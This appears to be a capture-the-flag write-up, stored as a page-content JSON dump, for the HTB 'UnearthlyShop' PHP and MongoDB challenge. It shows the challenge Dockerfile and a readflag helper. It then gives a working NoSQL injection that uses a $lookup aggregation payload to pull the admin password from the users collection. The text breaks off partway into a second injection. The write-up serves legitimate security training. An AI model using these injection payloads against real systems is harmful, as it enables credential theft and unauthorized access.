[{"data":1,"prerenderedAt":3323},["ShallowReactive",2],{"content-query-c1TNeG8cyf":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":28,"_type":3317,"_id":3318,"_source":3319,"_file":3320,"_stem":3321,"_extension":3322},"/writeups/unearthly-shop","writeups",false,"","UnearthlyShop",{"title":8,"description":10,"keywords":11,"slug":12,"image":13,"date":14,"meta":15},"UnearthlyShop challenge, was a hard web challenge from HTB cyber apocalypse. It was about php gadgets, php deserialization and autoload function.","web,php,deserialization,gadgets,autoload","unearthly-shop","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743778740/writeups/cyber_appo_2023.webp","2023-03-23",[16,17,18,19,21,23,24,26],{"og:image":13},{"og:title":8},{"og:description":10},{"og:type":20},"article",{"og:url":22},"https://owalid.com/unearthly-shop",{"description":10},{"title":25},"UnearthlyShop writeup",{"keywords":27},"web,php,deserialization,gadgets,autoload,htb,ctf",{"type":29,"children":30,"toc":3308},"root",[31,39,46,52,57,79,84,262,267,424,430,435,440,460,465,471,477,482,487,498,503,508,640,645,661,665,1109,1114,1119,1241,1246,1250,1256,1261,1410,1415,1420,1654,1659,1664,1988,1997,2002,2007,2221,2233,2239,2252,2264,2270,2284,2289,2294,2298,2306,2311,2316,2321,2928,2933,2938,2943,3080,3085,3142,3147,3158,3163,3174,3179,3184,3195,3204,3212,3217,3222,3228,3233,3238,3243,3253,3265,3276,3281,3292,3297,3302],{"type":32,"tag":33,"props":34,"children":36},"element","h1",{"id":35},"unearthlyshop",[37],{"type":38,"value":8},"text",{"type":32,"tag":40,"props":41,"children":43},"h2",{"id":42},"introduction",[44],{"type":38,"value":45},"Introduction",{"type":32,"tag":47,"props":48,"children":49},"p",{},[50],{"type":38,"value":51},"UnearthlyShop was a web hard challenge from HTB cyber apocalypse 2023.",{"type":32,"tag":47,"props":53,"children":54},{},[55],{"type":38,"value":56},"This challenge was in white box, meaning we have access to the source code of the website.",{"type":32,"tag":47,"props":58,"children":59},{},[60,62,69,71,77],{"type":38,"value":61},"We can see in the DockerFile that the flag is stored in the directory ",{"type":32,"tag":63,"props":64,"children":66},"code",{"className":65},[],[67],{"type":38,"value":68},"/root",{"type":38,"value":70}," and that they give us permission on an executable file called ",{"type":32,"tag":63,"props":72,"children":74},{"className":73},[],[75],{"type":38,"value":76},"/readflag",{"type":38,"value":78},". This gives us a hint on the type of attack we need to perform.",{"type":32,"tag":47,"props":80,"children":81},{},[82],{"type":38,"value":83},"In other words, we need to have a RCE (Remote Code Execution). Without this, we will not be able to read the flag.",{"type":32,"tag":85,"props":86,"children":88},"code-card",{"lang":87},"docker",[89],{"type":32,"tag":90,"props":91,"children":94},"pre",{"code":92,"language":87,"meta":7,"className":93,"style":7},"...\n# Setup user\nRUN useradd www\n\n# Add readflag binary\nCOPY flag.txt /root/flag\nCOPY config/readflag.c /\nRUN gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm /readflag.c\n\n# Copy challenge files\nCOPY challenge /www\n\n# Setup permissions\nRUN chown -R www:www /var/lib/nginx\n...\n","language-docker shiki shiki-themes vitesse-dark",[95],{"type":32,"tag":63,"props":96,"children":97},{"__ignoreMap":7},[98,110,120,135,145,154,168,181,194,202,211,224,232,241,254],{"type":32,"tag":99,"props":100,"children":103},"span",{"class":101,"line":102},"line",1,[104],{"type":32,"tag":99,"props":105,"children":107},{"style":106},"--shiki-default:#DBD7CAEE",[108],{"type":38,"value":109},"...\n",{"type":32,"tag":99,"props":111,"children":113},{"class":101,"line":112},2,[114],{"type":32,"tag":99,"props":115,"children":117},{"style":116},"--shiki-default:#758575DD",[118],{"type":38,"value":119},"# Setup user\n",{"type":32,"tag":99,"props":121,"children":123},{"class":101,"line":122},3,[124,130],{"type":32,"tag":99,"props":125,"children":127},{"style":126},"--shiki-default:#4D9375",[128],{"type":38,"value":129},"RUN",{"type":32,"tag":99,"props":131,"children":132},{"style":106},[133],{"type":38,"value":134}," useradd www\n",{"type":32,"tag":99,"props":136,"children":138},{"class":101,"line":137},4,[139],{"type":32,"tag":99,"props":140,"children":142},{"emptyLinePlaceholder":141},true,[143],{"type":38,"value":144},"\n",{"type":32,"tag":99,"props":146,"children":148},{"class":101,"line":147},5,[149],{"type":32,"tag":99,"props":150,"children":151},{"style":116},[152],{"type":38,"value":153},"# Add readflag binary\n",{"type":32,"tag":99,"props":155,"children":157},{"class":101,"line":156},6,[158,163],{"type":32,"tag":99,"props":159,"children":160},{"style":126},[161],{"type":38,"value":162},"COPY",{"type":32,"tag":99,"props":164,"children":165},{"style":106},[166],{"type":38,"value":167}," flag.txt /root/flag\n",{"type":32,"tag":99,"props":169,"children":171},{"class":101,"line":170},7,[172,176],{"type":32,"tag":99,"props":173,"children":174},{"style":126},[175],{"type":38,"value":162},{"type":32,"tag":99,"props":177,"children":178},{"style":106},[179],{"type":38,"value":180}," config/readflag.c /\n",{"type":32,"tag":99,"props":182,"children":184},{"class":101,"line":183},8,[185,189],{"type":32,"tag":99,"props":186,"children":187},{"style":126},[188],{"type":38,"value":129},{"type":32,"tag":99,"props":190,"children":191},{"style":106},[192],{"type":38,"value":193}," gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm /readflag.c\n",{"type":32,"tag":99,"props":195,"children":197},{"class":101,"line":196},9,[198],{"type":32,"tag":99,"props":199,"children":200},{"emptyLinePlaceholder":141},[201],{"type":38,"value":144},{"type":32,"tag":99,"props":203,"children":205},{"class":101,"line":204},10,[206],{"type":32,"tag":99,"props":207,"children":208},{"style":116},[209],{"type":38,"value":210},"# Copy challenge files\n",{"type":32,"tag":99,"props":212,"children":214},{"class":101,"line":213},11,[215,219],{"type":32,"tag":99,"props":216,"children":217},{"style":126},[218],{"type":38,"value":162},{"type":32,"tag":99,"props":220,"children":221},{"style":106},[222],{"type":38,"value":223}," challenge /www\n",{"type":32,"tag":99,"props":225,"children":227},{"class":101,"line":226},12,[228],{"type":32,"tag":99,"props":229,"children":230},{"emptyLinePlaceholder":141},[231],{"type":38,"value":144},{"type":32,"tag":99,"props":233,"children":235},{"class":101,"line":234},13,[236],{"type":32,"tag":99,"props":237,"children":238},{"style":116},[239],{"type":38,"value":240},"# Setup permissions\n",{"type":32,"tag":99,"props":242,"children":244},{"class":101,"line":243},14,[245,249],{"type":32,"tag":99,"props":246,"children":247},{"style":126},[248],{"type":38,"value":129},{"type":32,"tag":99,"props":250,"children":251},{"style":106},[252],{"type":38,"value":253}," chown -R www:www /var/lib/nginx\n",{"type":32,"tag":99,"props":255,"children":257},{"class":101,"line":256},15,[258],{"type":32,"tag":99,"props":259,"children":260},{"style":106},[261],{"type":38,"value":109},{"type":32,"tag":47,"props":263,"children":264},{},[265],{"type":38,"value":266},"And this is the readflag.c file:",{"type":32,"tag":85,"props":268,"children":270},{"lang":269},"c",[271],{"type":32,"tag":90,"props":272,"children":275},{"code":273,"language":269,"meta":7,"className":274,"style":7},"#include\u003Cunistd.h>\n#include\u003Cstdlib.h>\nint main()\n{\n    setuid(0);\n    system(\"cat /root/flag\");\n}\n","language-c shiki shiki-themes vitesse-dark",[276],{"type":32,"tag":63,"props":277,"children":278},{"__ignoreMap":7},[279,310,334,354,362,386,416],{"type":32,"tag":99,"props":280,"children":281},{"class":101,"line":102},[282,288,293,299,305],{"type":32,"tag":99,"props":283,"children":285},{"style":284},"--shiki-default:#666666",[286],{"type":38,"value":287},"#",{"type":32,"tag":99,"props":289,"children":290},{"style":126},[291],{"type":38,"value":292},"include",{"type":32,"tag":99,"props":294,"children":296},{"style":295},"--shiki-default:#C98A7D77",[297],{"type":38,"value":298},"\u003C",{"type":32,"tag":99,"props":300,"children":302},{"style":301},"--shiki-default:#C98A7D",[303],{"type":38,"value":304},"unistd.h",{"type":32,"tag":99,"props":306,"children":307},{"style":295},[308],{"type":38,"value":309},">\n",{"type":32,"tag":99,"props":311,"children":312},{"class":101,"line":112},[313,317,321,325,330],{"type":32,"tag":99,"props":314,"children":315},{"style":284},[316],{"type":38,"value":287},{"type":32,"tag":99,"props":318,"children":319},{"style":126},[320],{"type":38,"value":292},{"type":32,"tag":99,"props":322,"children":323},{"style":295},[324],{"type":38,"value":298},{"type":32,"tag":99,"props":326,"children":327},{"style":301},[328],{"type":38,"value":329},"stdlib.h",{"type":32,"tag":99,"props":331,"children":332},{"style":295},[333],{"type":38,"value":309},{"type":32,"tag":99,"props":335,"children":336},{"class":101,"line":122},[337,343,349],{"type":32,"tag":99,"props":338,"children":340},{"style":339},"--shiki-default:#CB7676",[341],{"type":38,"value":342},"int",{"type":32,"tag":99,"props":344,"children":346},{"style":345},"--shiki-default:#80A665",[347],{"type":38,"value":348}," main",{"type":32,"tag":99,"props":350,"children":351},{"style":284},[352],{"type":38,"value":353},"()\n",{"type":32,"tag":99,"props":355,"children":356},{"class":101,"line":137},[357],{"type":32,"tag":99,"props":358,"children":359},{"style":284},[360],{"type":38,"value":361},"{\n",{"type":32,"tag":99,"props":363,"children":364},{"class":101,"line":147},[365,370,375,381],{"type":32,"tag":99,"props":366,"children":367},{"style":345},[368],{"type":38,"value":369},"    setuid",{"type":32,"tag":99,"props":371,"children":372},{"style":284},[373],{"type":38,"value":374},"(",{"type":32,"tag":99,"props":376,"children":378},{"style":377},"--shiki-default:#4C9A91",[379],{"type":38,"value":380},"0",{"type":32,"tag":99,"props":382,"children":383},{"style":284},[384],{"type":38,"value":385},");\n",{"type":32,"tag":99,"props":387,"children":388},{"class":101,"line":156},[389,394,398,403,408,412],{"type":32,"tag":99,"props":390,"children":391},{"style":345},[392],{"type":38,"value":393},"    system",{"type":32,"tag":99,"props":395,"children":396},{"style":284},[397],{"type":38,"value":374},{"type":32,"tag":99,"props":399,"children":400},{"style":295},[401],{"type":38,"value":402},"\"",{"type":32,"tag":99,"props":404,"children":405},{"style":301},[406],{"type":38,"value":407},"cat /root/flag",{"type":32,"tag":99,"props":409,"children":410},{"style":295},[411],{"type":38,"value":402},{"type":32,"tag":99,"props":413,"children":414},{"style":284},[415],{"type":38,"value":385},{"type":32,"tag":99,"props":417,"children":418},{"class":101,"line":170},[419],{"type":32,"tag":99,"props":420,"children":421},{"style":284},[422],{"type":38,"value":423},"}\n",{"type":32,"tag":40,"props":425,"children":427},{"id":426},"recon",[428],{"type":38,"value":429},"Recon",{"type":32,"tag":47,"props":431,"children":432},{},[433],{"type":38,"value":434},"The application follows the same architecture as an ecommerce website, with a store for customers and a back office for administrators.",{"type":32,"tag":47,"props":436,"children":437},{},[438],{"type":38,"value":439},"The application has three services: two PHP-FPM services and a mongodb database.",{"type":32,"tag":441,"props":442,"children":443},"ul",{},[444,450,455],{"type":32,"tag":445,"props":446,"children":447},"li",{},[448],{"type":38,"value":449},"The first PHP-FPM service is used to serve the website. (store)",{"type":32,"tag":445,"props":451,"children":452},{},[453],{"type":38,"value":454},"The second PHP-FPM service is used to serve the back office. (admin)",{"type":32,"tag":445,"props":456,"children":457},{},[458],{"type":38,"value":459},"The mongodb database is used to store information about users, products, orders, etc.",{"type":32,"tag":47,"props":461,"children":462},{},[463],{"type":38,"value":464},"This is the architecture of the application:",{"type":32,"tag":466,"props":467,"children":470},"img",{"width":468,"src":469},1031,"https://user-images.githubusercontent.com/28403617/227585032-3b53b421-bf05-4a75-98ad-1bf1a662e979.png",[],{"type":32,"tag":40,"props":472,"children":474},{"id":473},"first-nosqli",[475],{"type":38,"value":476},"First NoSQLI",{"type":32,"tag":47,"props":478,"children":479},{},[480],{"type":38,"value":481},"For now, we only have access to the frontend part, the backoffice part is protected by a password.",{"type":32,"tag":47,"props":483,"children":484},{},[485],{"type":38,"value":486},"One request that caught our attention more than others:",{"type":32,"tag":85,"props":488,"children":489},{},[490],{"type":32,"tag":90,"props":491,"children":493},{"code":492},"POST /api/products HTTP/1.1\nHost: localhost:1337\nContent-Type: application/json\nContent-Length: 29\n\n[{\"$match\":{\"instock\":true}}]\n",[494],{"type":32,"tag":63,"props":495,"children":496},{"__ignoreMap":7},[497],{"type":38,"value":492},{"type":32,"tag":47,"props":499,"children":500},{},[501],{"type":38,"value":502},"$match is a MongoDB aggregation pipeline operator that matches all documents that meet the specified conditions.",{"type":32,"tag":47,"props":504,"children":505},{},[506],{"type":38,"value":507},"If we look at the code, we can see that the parameter is not protected to inject MongoDB code.",{"type":32,"tag":85,"props":509,"children":511},{"land":510},"php",[512],{"type":32,"tag":90,"props":513,"children":516},{"code":514,"language":510,"meta":7,"className":515,"style":7},"public function getProducts($query)\n{\n    return $this->database->query('products', $query);\n}\n","language-php shiki shiki-themes vitesse-dark",[517],{"type":32,"tag":63,"props":518,"children":519},{"__ignoreMap":7},[520,554,561,633],{"type":32,"tag":99,"props":521,"children":522},{"class":101,"line":102},[523,528,533,538,543,549],{"type":32,"tag":99,"props":524,"children":525},{"style":339},[526],{"type":38,"value":527},"public",{"type":32,"tag":99,"props":529,"children":530},{"style":339},[531],{"type":38,"value":532}," function",{"type":32,"tag":99,"props":534,"children":535},{"style":345},[536],{"type":38,"value":537}," getProducts",{"type":32,"tag":99,"props":539,"children":540},{"style":284},[541],{"type":38,"value":542},"($",{"type":32,"tag":99,"props":544,"children":546},{"style":545},"--shiki-default:#BD976A",[547],{"type":38,"value":548},"query",{"type":32,"tag":99,"props":550,"children":551},{"style":284},[552],{"type":38,"value":553},")\n",{"type":32,"tag":99,"props":555,"children":556},{"class":101,"line":112},[557],{"type":32,"tag":99,"props":558,"children":559},{"style":284},[560],{"type":38,"value":361},{"type":32,"tag":99,"props":562,"children":563},{"class":101,"line":122},[564,569,574,580,585,590,594,598,602,607,612,616,621,625,629],{"type":32,"tag":99,"props":565,"children":566},{"style":126},[567],{"type":38,"value":568},"    return",{"type":32,"tag":99,"props":570,"children":571},{"style":284},[572],{"type":38,"value":573}," $",{"type":32,"tag":99,"props":575,"children":577},{"style":576},"--shiki-default:#C99076",[578],{"type":38,"value":579},"this",{"type":32,"tag":99,"props":581,"children":582},{"style":339},[583],{"type":38,"value":584},"->",{"type":32,"tag":99,"props":586,"children":587},{"style":545},[588],{"type":38,"value":589},"database",{"type":32,"tag":99,"props":591,"children":592},{"style":339},[593],{"type":38,"value":584},{"type":32,"tag":99,"props":595,"children":596},{"style":345},[597],{"type":38,"value":548},{"type":32,"tag":99,"props":599,"children":600},{"style":284},[601],{"type":38,"value":374},{"type":32,"tag":99,"props":603,"children":604},{"style":295},[605],{"type":38,"value":606},"'",{"type":32,"tag":99,"props":608,"children":609},{"style":301},[610],{"type":38,"value":611},"products",{"type":32,"tag":99,"props":613,"children":614},{"style":295},[615],{"type":38,"value":606},{"type":32,"tag":99,"props":617,"children":618},{"style":284},[619],{"type":38,"value":620},",",{"type":32,"tag":99,"props":622,"children":623},{"style":284},[624],{"type":38,"value":573},{"type":32,"tag":99,"props":626,"children":627},{"style":545},[628],{"type":38,"value":548},{"type":32,"tag":99,"props":630,"children":631},{"style":284},[632],{"type":38,"value":385},{"type":32,"tag":99,"props":634,"children":635},{"class":101,"line":137},[636],{"type":32,"tag":99,"props":637,"children":638},{"style":284},[639],{"type":38,"value":423},{"type":32,"tag":47,"props":641,"children":642},{},[643],{"type":38,"value":644},"It is therefore possible to inject MongoDB code from this request.",{"type":32,"tag":47,"props":646,"children":647},{},[648,650,659],{"type":38,"value":649},"With ",{"type":32,"tag":651,"props":652,"children":656},"a",{"href":653,"rel":654},"https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/",[655],"nofollow",[657],{"type":38,"value":658},"$lookup",{"type":38,"value":660},", it is possible to retrieve data from another MongoDB collection.",{"type":32,"tag":466,"props":662,"children":664},{"width":468,"src":663},"https://user-images.githubusercontent.com/28403617/227582895-e91a7105-203e-4db9-8de0-fac60f5a1a35.png",[],{"type":32,"tag":85,"props":666,"children":668},{"land":667},"json",[669],{"type":32,"tag":90,"props":670,"children":673},{"code":671,"language":667,"meta":7,"className":672,"style":7},"[\n  {\n    \"$lookup\": {\n      \"from\": \"users\", \u003C- This is the collection we want to retrieve data from\n      \"localField\": \"aaaaa\", \u003C- This is the field from the input collection\n      \"foreignField\": \"aaaaa\", \u003C- This is the field that the documents in the from collection must match\n      \"as\": \"adminData\" \u003C- This is the name of the new field that will contain the data\n    }\n  }\n]\n","language-json shiki shiki-themes vitesse-dark",[674],{"type":32,"tag":63,"props":675,"children":676},{"__ignoreMap":7},[677,685,693,721,816,893,990,1085,1093,1101],{"type":32,"tag":99,"props":678,"children":679},{"class":101,"line":102},[680],{"type":32,"tag":99,"props":681,"children":682},{"style":284},[683],{"type":38,"value":684},"[\n",{"type":32,"tag":99,"props":686,"children":687},{"class":101,"line":112},[688],{"type":32,"tag":99,"props":689,"children":690},{"style":284},[691],{"type":38,"value":692},"  {\n",{"type":32,"tag":99,"props":694,"children":695},{"class":101,"line":122},[696,702,707,711,716],{"type":32,"tag":99,"props":697,"children":699},{"style":698},"--shiki-default:#B8A96577",[700],{"type":38,"value":701},"    \"",{"type":32,"tag":99,"props":703,"children":705},{"style":704},"--shiki-default:#B8A965",[706],{"type":38,"value":658},{"type":32,"tag":99,"props":708,"children":709},{"style":698},[710],{"type":38,"value":402},{"type":32,"tag":99,"props":712,"children":713},{"style":284},[714],{"type":38,"value":715},":",{"type":32,"tag":99,"props":717,"children":718},{"style":284},[719],{"type":38,"value":720}," {\n",{"type":32,"tag":99,"props":722,"children":723},{"class":101,"line":137},[724,729,734,738,742,747,752,756,760,766,771,776,781,786,791,796,801,806,811],{"type":32,"tag":99,"props":725,"children":726},{"style":698},[727],{"type":38,"value":728},"      \"",{"type":32,"tag":99,"props":730,"children":731},{"style":704},[732],{"type":38,"value":733},"from",{"type":32,"tag":99,"props":735,"children":736},{"style":698},[737],{"type":38,"value":402},{"type":32,"tag":99,"props":739,"children":740},{"style":284},[741],{"type":38,"value":715},{"type":32,"tag":99,"props":743,"children":744},{"style":295},[745],{"type":38,"value":746}," \"",{"type":32,"tag":99,"props":748,"children":749},{"style":301},[750],{"type":38,"value":751},"users",{"type":32,"tag":99,"props":753,"children":754},{"style":295},[755],{"type":38,"value":402},{"type":32,"tag":99,"props":757,"children":758},{"style":284},[759],{"type":38,"value":620},{"type":32,"tag":99,"props":761,"children":763},{"style":762},"--shiki-default:#FDAEB7;--shiki-default-font-style:italic",[764],{"type":38,"value":765}," \u003C-",{"type":32,"tag":99,"props":767,"children":768},{"style":762},[769],{"type":38,"value":770}," This",{"type":32,"tag":99,"props":772,"children":773},{"style":762},[774],{"type":38,"value":775}," is",{"type":32,"tag":99,"props":777,"children":778},{"style":762},[779],{"type":38,"value":780}," the",{"type":32,"tag":99,"props":782,"children":783},{"style":762},[784],{"type":38,"value":785}," collection",{"type":32,"tag":99,"props":787,"children":788},{"style":762},[789],{"type":38,"value":790}," we",{"type":32,"tag":99,"props":792,"children":793},{"style":762},[794],{"type":38,"value":795}," want",{"type":32,"tag":99,"props":797,"children":798},{"style":762},[799],{"type":38,"value":800}," to",{"type":32,"tag":99,"props":802,"children":803},{"style":762},[804],{"type":38,"value":805}," retrieve",{"type":32,"tag":99,"props":807,"children":808},{"style":762},[809],{"type":38,"value":810}," data",{"type":32,"tag":99,"props":812,"children":813},{"style":762},[814],{"type":38,"value":815}," from\n",{"type":32,"tag":99,"props":817,"children":818},{"class":101,"line":147},[819,823,828,832,836,840,845,849,853,857,861,865,869,874,879,883,888],{"type":32,"tag":99,"props":820,"children":821},{"style":698},[822],{"type":38,"value":728},{"type":32,"tag":99,"props":824,"children":825},{"style":704},[826],{"type":38,"value":827},"localField",{"type":32,"tag":99,"props":829,"children":830},{"style":698},[831],{"type":38,"value":402},{"type":32,"tag":99,"props":833,"children":834},{"style":284},[835],{"type":38,"value":715},{"type":32,"tag":99,"props":837,"children":838},{"style":295},[839],{"type":38,"value":746},{"type":32,"tag":99,"props":841,"children":842},{"style":301},[843],{"type":38,"value":844},"aaaaa",{"type":32,"tag":99,"props":846,"children":847},{"style":295},[848],{"type":38,"value":402},{"type":32,"tag":99,"props":850,"children":851},{"style":284},[852],{"type":38,"value":620},{"type":32,"tag":99,"props":854,"children":855},{"style":762},[856],{"type":38,"value":765},{"type":32,"tag":99,"props":858,"children":859},{"style":762},[860],{"type":38,"value":770},{"type":32,"tag":99,"props":862,"children":863},{"style":762},[864],{"type":38,"value":775},{"type":32,"tag":99,"props":866,"children":867},{"style":762},[868],{"type":38,"value":780},{"type":32,"tag":99,"props":870,"children":871},{"style":762},[872],{"type":38,"value":873}," field",{"type":32,"tag":99,"props":875,"children":876},{"style":762},[877],{"type":38,"value":878}," from",{"type":32,"tag":99,"props":880,"children":881},{"style":762},[882],{"type":38,"value":780},{"type":32,"tag":99,"props":884,"children":885},{"style":762},[886],{"type":38,"value":887}," input",{"type":32,"tag":99,"props":889,"children":890},{"style":762},[891],{"type":38,"value":892}," collection\n",{"type":32,"tag":99,"props":894,"children":895},{"class":101,"line":156},[896,900,905,909,913,917,921,925,929,933,937,941,945,949,954,958,963,968,972,976,980,985],{"type":32,"tag":99,"props":897,"children":898},{"style":698},[899],{"type":38,"value":728},{"type":32,"tag":99,"props":901,"children":902},{"style":704},[903],{"type":38,"value":904},"foreignField",{"type":32,"tag":99,"props":906,"children":907},{"style":698},[908],{"type":38,"value":402},{"type":32,"tag":99,"props":910,"children":911},{"style":284},[912],{"type":38,"value":715},{"type":32,"tag":99,"props":914,"children":915},{"style":295},[916],{"type":38,"value":746},{"type":32,"tag":99,"props":918,"children":919},{"style":301},[920],{"type":38,"value":844},{"type":32,"tag":99,"props":922,"children":923},{"style":295},[924],{"type":38,"value":402},{"type":32,"tag":99,"props":926,"children":927},{"style":284},[928],{"type":38,"value":620},{"type":32,"tag":99,"props":930,"children":931},{"style":762},[932],{"type":38,"value":765},{"type":32,"tag":99,"props":934,"children":935},{"style":762},[936],{"type":38,"value":770},{"type":32,"tag":99,"props":938,"children":939},{"style":762},[940],{"type":38,"value":775},{"type":32,"tag":99,"props":942,"children":943},{"style":762},[944],{"type":38,"value":780},{"type":32,"tag":99,"props":946,"children":947},{"style":762},[948],{"type":38,"value":873},{"type":32,"tag":99,"props":950,"children":951},{"style":762},[952],{"type":38,"value":953}," that",{"type":32,"tag":99,"props":955,"children":956},{"style":762},[957],{"type":38,"value":780},{"type":32,"tag":99,"props":959,"children":960},{"style":762},[961],{"type":38,"value":962}," documents",{"type":32,"tag":99,"props":964,"children":965},{"style":762},[966],{"type":38,"value":967}," in",{"type":32,"tag":99,"props":969,"children":970},{"style":762},[971],{"type":38,"value":780},{"type":32,"tag":99,"props":973,"children":974},{"style":762},[975],{"type":38,"value":878},{"type":32,"tag":99,"props":977,"children":978},{"style":762},[979],{"type":38,"value":785},{"type":32,"tag":99,"props":981,"children":982},{"style":762},[983],{"type":38,"value":984}," must",{"type":32,"tag":99,"props":986,"children":987},{"style":762},[988],{"type":38,"value":989}," match\n",{"type":32,"tag":99,"props":991,"children":992},{"class":101,"line":170},[993,997,1002,1006,1010,1014,1019,1023,1027,1031,1035,1039,1044,1049,1053,1058,1062,1066,1071,1076,1080],{"type":32,"tag":99,"props":994,"children":995},{"style":698},[996],{"type":38,"value":728},{"type":32,"tag":99,"props":998,"children":999},{"style":704},[1000],{"type":38,"value":1001},"as",{"type":32,"tag":99,"props":1003,"children":1004},{"style":698},[1005],{"type":38,"value":402},{"type":32,"tag":99,"props":1007,"children":1008},{"style":284},[1009],{"type":38,"value":715},{"type":32,"tag":99,"props":1011,"children":1012},{"style":295},[1013],{"type":38,"value":746},{"type":32,"tag":99,"props":1015,"children":1016},{"style":301},[1017],{"type":38,"value":1018},"adminData",{"type":32,"tag":99,"props":1020,"children":1021},{"style":295},[1022],{"type":38,"value":402},{"type":32,"tag":99,"props":1024,"children":1025},{"style":762},[1026],{"type":38,"value":765},{"type":32,"tag":99,"props":1028,"children":1029},{"style":762},[1030],{"type":38,"value":770},{"type":32,"tag":99,"props":1032,"children":1033},{"style":762},[1034],{"type":38,"value":775},{"type":32,"tag":99,"props":1036,"children":1037},{"style":762},[1038],{"type":38,"value":780},{"type":32,"tag":99,"props":1040,"children":1041},{"style":762},[1042],{"type":38,"value":1043}," name",{"type":32,"tag":99,"props":1045,"children":1046},{"style":762},[1047],{"type":38,"value":1048}," of",{"type":32,"tag":99,"props":1050,"children":1051},{"style":762},[1052],{"type":38,"value":780},{"type":32,"tag":99,"props":1054,"children":1055},{"style":762},[1056],{"type":38,"value":1057}," new",{"type":32,"tag":99,"props":1059,"children":1060},{"style":762},[1061],{"type":38,"value":873},{"type":32,"tag":99,"props":1063,"children":1064},{"style":762},[1065],{"type":38,"value":953},{"type":32,"tag":99,"props":1067,"children":1068},{"style":762},[1069],{"type":38,"value":1070}," will",{"type":32,"tag":99,"props":1072,"children":1073},{"style":762},[1074],{"type":38,"value":1075}," contain",{"type":32,"tag":99,"props":1077,"children":1078},{"style":762},[1079],{"type":38,"value":780},{"type":32,"tag":99,"props":1081,"children":1082},{"style":762},[1083],{"type":38,"value":1084}," data\n",{"type":32,"tag":99,"props":1086,"children":1087},{"class":101,"line":183},[1088],{"type":32,"tag":99,"props":1089,"children":1090},{"style":284},[1091],{"type":38,"value":1092},"    }\n",{"type":32,"tag":99,"props":1094,"children":1095},{"class":101,"line":196},[1096],{"type":32,"tag":99,"props":1097,"children":1098},{"style":284},[1099],{"type":38,"value":1100},"  }\n",{"type":32,"tag":99,"props":1102,"children":1103},{"class":101,"line":204},[1104],{"type":32,"tag":99,"props":1105,"children":1106},{"style":284},[1107],{"type":38,"value":1108},"]\n",{"type":32,"tag":47,"props":1110,"children":1111},{},[1112],{"type":38,"value":1113},"If an input document does not contain the localField or the foreignField, the $lookup treats the field as having a value of null for matching purposes.",{"type":32,"tag":47,"props":1115,"children":1116},{},[1117],{"type":38,"value":1118},"This is an sql representation of the request:",{"type":32,"tag":85,"props":1120,"children":1122},{"lang":1121},"sql",[1123],{"type":32,"tag":90,"props":1124,"children":1127},{"code":1125,"language":1121,"meta":7,"className":1126,"style":7},"SELECT *, adminData\nFROM products\nWHERE adminData IN (\n   SELECT *\n   FROM users\n   WHERE null = null\n);\n","language-sql shiki shiki-themes vitesse-dark",[1128],{"type":32,"tag":63,"props":1129,"children":1130},{"__ignoreMap":7},[1131,1149,1162,1185,1198,1211,1234],{"type":32,"tag":99,"props":1132,"children":1133},{"class":101,"line":102},[1134,1139,1144],{"type":32,"tag":99,"props":1135,"children":1136},{"style":126},[1137],{"type":38,"value":1138},"SELECT",{"type":32,"tag":99,"props":1140,"children":1141},{"style":339},[1142],{"type":38,"value":1143}," *",{"type":32,"tag":99,"props":1145,"children":1146},{"style":106},[1147],{"type":38,"value":1148},", adminData\n",{"type":32,"tag":99,"props":1150,"children":1151},{"class":101,"line":112},[1152,1157],{"type":32,"tag":99,"props":1153,"children":1154},{"style":126},[1155],{"type":38,"value":1156},"FROM",{"type":32,"tag":99,"props":1158,"children":1159},{"style":106},[1160],{"type":38,"value":1161}," products\n",{"type":32,"tag":99,"props":1163,"children":1164},{"class":101,"line":122},[1165,1170,1175,1180],{"type":32,"tag":99,"props":1166,"children":1167},{"style":126},[1168],{"type":38,"value":1169},"WHERE",{"type":32,"tag":99,"props":1171,"children":1172},{"style":106},[1173],{"type":38,"value":1174}," adminData ",{"type":32,"tag":99,"props":1176,"children":1177},{"style":126},[1178],{"type":38,"value":1179},"IN",{"type":32,"tag":99,"props":1181,"children":1182},{"style":106},[1183],{"type":38,"value":1184}," (\n",{"type":32,"tag":99,"props":1186,"children":1187},{"class":101,"line":137},[1188,1193],{"type":32,"tag":99,"props":1189,"children":1190},{"style":126},[1191],{"type":38,"value":1192},"   SELECT",{"type":32,"tag":99,"props":1194,"children":1195},{"style":339},[1196],{"type":38,"value":1197}," *\n",{"type":32,"tag":99,"props":1199,"children":1200},{"class":101,"line":147},[1201,1206],{"type":32,"tag":99,"props":1202,"children":1203},{"style":126},[1204],{"type":38,"value":1205},"   FROM",{"type":32,"tag":99,"props":1207,"children":1208},{"style":106},[1209],{"type":38,"value":1210}," users\n",{"type":32,"tag":99,"props":1212,"children":1213},{"class":101,"line":156},[1214,1219,1224,1229],{"type":32,"tag":99,"props":1215,"children":1216},{"style":126},[1217],{"type":38,"value":1218},"   WHERE",{"type":32,"tag":99,"props":1220,"children":1221},{"style":126},[1222],{"type":38,"value":1223}," null",{"type":32,"tag":99,"props":1225,"children":1226},{"style":339},[1227],{"type":38,"value":1228}," =",{"type":32,"tag":99,"props":1230,"children":1231},{"style":126},[1232],{"type":38,"value":1233}," null\n",{"type":32,"tag":99,"props":1235,"children":1236},{"class":101,"line":170},[1237],{"type":32,"tag":99,"props":1238,"children":1239},{"style":106},[1240],{"type":38,"value":385},{"type":32,"tag":47,"props":1242,"children":1243},{},[1244],{"type":38,"value":1245},"This allows us to retrieve the administrator's password.",{"type":32,"tag":466,"props":1247,"children":1249},{"width":468,"src":1248},"https://user-images.githubusercontent.com/28403617/227583798-02661604-c9b8-4e10-a47a-841e6d3e6b38.png",[],{"type":32,"tag":40,"props":1251,"children":1253},{"id":1252},"second-nosqli",[1254],{"type":38,"value":1255},"Second NoSQLI",{"type":32,"tag":47,"props":1257,"children":1258},{},[1259],{"type":38,"value":1260},"By analyzing the code, we quickly realize that a request also don't have protection.",{"type":32,"tag":85,"props":1262,"children":1263},{"lang":510},[1264],{"type":32,"tag":90,"props":1265,"children":1267},{"code":1266,"language":510,"meta":7,"className":515,"style":7},"public function updateUser($data)\n{\n  return $this->database->update('users', $data['_id'], 